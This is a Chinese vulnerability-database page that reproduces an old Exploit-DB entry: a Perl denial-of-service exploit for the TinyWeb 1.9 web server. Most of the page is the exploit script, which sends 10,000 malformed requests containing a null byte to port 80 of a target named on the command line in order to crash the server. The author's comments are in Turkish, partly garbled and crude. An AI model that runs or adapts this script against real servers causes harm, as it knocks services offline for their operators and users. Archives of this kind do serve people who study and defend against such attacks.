TinyWeb 1.9 – Denial of Service

TinyWeb 1.9 – Denial of Service

漏洞ID 1054878 漏洞类型
发布时间 2005-02-01 更新时间 2005-02-01
图片[1]-TinyWeb 1.9 – Denial of Service-安全小百科CVE编号 N/A
图片[2]-TinyWeb 1.9 – Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/782
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#TinyWeb version 1.9 DoS Exploit
#Coded bY ++Karak0rsan++
#Usage:perl tiny.pl [target]
#Greetz:Phalaposher,r3d_b4r0n,Hurby,ZzagorR,L4M3R,zeronc,Atak,sloan,fox and
#all my friends
# w0rdz: cengiz g t ne sokam senin ehehheh bak exploit yay nlan rsa reziL #olacan :D ama #yay nlanmaz belki yay nlansada bo ver nickini s ylemiyom #anlamazlar :P okullar a l yo peder benim #bilg. kald r yo ne yapcam ben #bilmiyom a.k :) siktiri boktan bi dos exploiti yazd k yolluyoz g venlik
#sitesine :D neyse uzatmayal m "I AM 15 YEARS OLD" ya m z belirtelim :D

$target=$ARGV[0];

if(!$ARGV[0]){
        print "TinyWeb version 1.9 DoS Exploitn";
        print "Coded by ++Karak0rsan++n";
        print "Usage:perl tiny.pl [target]n";
}


use IO::Socket;
$sock = new IO::Socket::INET( PeerAddr => $target,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($sock);
if($sock){
        print "[+]Attacking...n";
}


$ish=1;

do {
$ish++;
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $target,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Didnt Connect,please check your target
address!n";
print $socket "GET /cgi-bin/.%00./dddd.html HTTP/1.0rn";
close($socket);
} while ($ish < 10000);

print "OK ;)n";
exit();

# milw0rm.com [2005-02-01]

相关推荐: HolaCMS 1.2.x – ‘HTMLtags.php’ Local File Inclusion

HolaCMS 1.2.x – ‘HTMLtags.php’ Local File Inclusion 漏洞ID 1054092 漏洞类型 发布时间 2003-08-13 更新时间 2003-08-13 CVE编号 N/A CNNVD-ID N/A 漏洞平台 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享